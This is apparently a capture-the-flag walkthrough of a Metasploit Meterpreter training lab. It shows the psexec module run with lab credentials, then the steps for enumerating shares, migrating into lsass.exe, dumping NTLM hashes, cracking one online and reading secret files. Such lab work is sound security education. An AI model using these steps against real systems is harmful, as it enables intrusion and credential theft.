Metasploit: Meterpreter

Task 1 Introduction to Meterpreter

Task 2 Meterpreter Flavors

Task 3 Meterpreter Commands

Task 4 Post-Exploitation with Meterpreter

Task 5 Post-Exploitation Challenge

Start msfconsole and enter use exploit/windows/smb/psexec.

Set the required options: RHOSTS (the target IP), SMBUser (ballen) and SMBPass (Password1). Finish by entering run. The module authenticates over SMB with those credentials and you should now have a Meterpreter session.

What is the computer name?

We can get this from sysinfo (the Computer field).

What is the target domain?

This is also in the sysinfo output (the Domain field).

What is the name of the share likely created by the user?

First, background the Meterpreter session with background, then use post/windows/gather/enum_shares and set SESSION 1 (the ID of the backgrounded session; check it with sessions -l if you have more than one). Invoking run lists the shares, and the one likely created by the user is named speedster.

What is the NTLM hash of the jchambers user?

First, run ps and look for the PID of lsass.exe, which is 764 in my case. Next, migrate 764 to move into that process (it runs as SYSTEM, which is what hashdump needs), then run hashdump. Each line of the output has the form user:RID:LM hash:NT hash:::; the answer is the NT hash (fourth field) of the jchambers line.

What is the cleartext password of the jchambers user?

Paste the NT hash (the fourth field of the hashdump line, not the LM field) into crackstation.net, which looks it up in its precomputed tables and returns the cleartext password.

Where is the “secrets.txt”  file located?

Run search -f secrets.txt; the output gives the full path of the file.

What is the Twitter password revealed in the “secrets.txt” file?

For this, cat the file. Because the path contains spaces, it must be wrapped in plain double quotes (curly quotes copied from a web page will not work): cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

Where is the “realsecret.txt” file located?

For this, run search -f realsecret.txt in the same way.

What is the real secret?

Now run cat "c:\inetpub\wwwroot\realsecret.txt" (this path has no spaces, so the quotes are optional here).